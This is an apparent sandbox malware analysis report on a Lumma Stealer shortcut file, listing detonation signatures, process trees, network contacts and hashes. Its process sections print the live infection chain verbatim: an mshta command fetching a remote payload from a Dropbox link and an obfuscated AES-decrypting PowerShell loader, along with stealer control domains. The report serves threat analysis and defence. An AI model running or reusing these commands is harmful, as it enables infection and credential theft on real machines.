Malware Analysis Report

2024-11-15 06:19

Sample ID 240227-f2e8hahb85
Target 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
SHA256 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
Tags
lumma evasion stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50

Threat Level: Known bad

The file 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk was found to be: Known bad.

Malicious Activity Summary

lumma evasion stealer trojan

Lumma Stealer

UAC bypass

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Modifies system certificate store

Modifies registry class

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-27 05:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-27 05:21

Reported

2024-02-27 05:24

Platform

win7-20240221-en

Max time kernel

119s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Windows\system32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1132 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 1132 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 1132 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2292 wrote to memory of 2484 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2484 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2484 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2484 wrote to memory of 2456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2484 wrote to memory of 2456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2484 wrote to memory of 2456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2456 wrote to memory of 1168 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1168 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1168 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country Destination Domain Proto
US 8.8.8.8:53 dl.dropboxusercontent.com udp
GB 162.125.64.15:443 dl.dropboxusercontent.com tcp

Files

memory/2484-40-0x000000001B320000-0x000000001B602000-memory.dmp

memory/2484-41-0x0000000002010000-0x0000000002018000-memory.dmp

memory/2484-42-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/2484-43-0x0000000002670000-0x00000000026F0000-memory.dmp

memory/2484-44-0x0000000002670000-0x00000000026F0000-memory.dmp

memory/2484-45-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/2484-46-0x0000000002670000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WQS6Z484B6BTW1XCZ8AJ.temp

MD5 7901212826eb130a49dd170cd9e46291
SHA1 3e2d163be64f8c261b4685c2e4cd0e93d567bd64
SHA256 e5ca5cef2dc4acacc0d2047b84d2be4e23590980a6421157c186f51a63e74825
SHA512 f4649624a43bdbca84460ce441eed2fad4f5e61a2605739d296d1cd565a6ae2501efbdc82df910b1f1a1d2972a9b0779b0374aa15f13b98dd42d4d4b3da72fd8

memory/1168-69-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

memory/1168-70-0x00000000023F0000-0x00000000023F8000-memory.dmp

memory/1168-71-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-72-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-73-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-74-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

memory/1168-76-0x0000000002A00000-0x0000000002A80000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1204-83-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1204-84-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-85-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1204-86-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-87-0x0000000001E80000-0x0000000001F00000-memory.dmp

memory/1204-88-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/1168-89-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

memory/2484-90-0x0000000002670000-0x00000000026F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-27 05:21

Reported

2024-02-27 05:24

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

152s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

Signatures

Lumma Stealer

stealer lumma

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driver.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-609813121-2907144057-1731107329-1000\{95469607-7B9A-455B-8133-0B85F82F9C00} C:\Windows\system32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2340 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2340 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 1956 wrote to memory of 2844 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2844 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2844 wrote to memory of 2300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2300 wrote to memory of 4420 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 4420 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 4440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 4440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4440 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\driver.exe
PID 4440 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\driver.exe
PID 4440 wrote to memory of 2228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\driver.exe
PID 2228 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2228 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\driver.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\driver.exe

"C:\Users\Admin\AppData\Roaming\driver.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 dl.dropboxusercontent.com udp
GB 162.125.64.15:443 dl.dropboxusercontent.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 15.64.125.162.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 toptendulichmy.com udp
VN 202.143.111.175:443 toptendulichmy.com tcp
US 8.8.8.8:53 175.111.143.202.in-addr.arpa udp
US 8.8.8.8:53 executivebrakeji.shop udp
US 104.21.69.250:443 executivebrakeji.shop tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 172.67.180.132:443 technologyenterdo.shop tcp
US 8.8.8.8:53 250.69.21.104.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 172.67.195.126:443 detectordiscusser.shop tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 132.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 126.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp

Files

memory/2844-2-0x0000010429A50000-0x0000010429A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmkd1iyb.55p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2844-11-0x00007FFE157B0000-0x00007FFE16271000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 feadc4e1a70c13480ef147aca0c47bc0
SHA1 d7a5084c93842a290b24dacec0cd3904c2266819
SHA256 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
